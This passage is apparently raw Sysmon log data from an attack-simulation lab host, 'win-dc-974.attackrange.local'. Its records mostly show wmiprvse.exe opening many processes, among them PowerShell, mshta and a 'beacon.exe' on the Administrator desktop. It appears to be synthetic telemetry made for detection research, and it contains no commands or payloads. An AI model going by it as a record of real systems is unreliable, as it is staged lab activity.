Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242128Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242127Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242126Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242125Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242124Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242123Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242122Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242121Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242120Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242119Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242118Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242117Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242116Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242115Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242114Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242113Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242112Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.514{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-CDAA-00000000AD01}12876C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242111Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.514{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-CDAA-00000000AD01}12876C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242110Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002242109Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:54:42.514{05ADC7E1-6DD2-603E-CAAA-00000000AD01}12336\PSHost.132591776823705266.12336.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002242108Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242107Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program 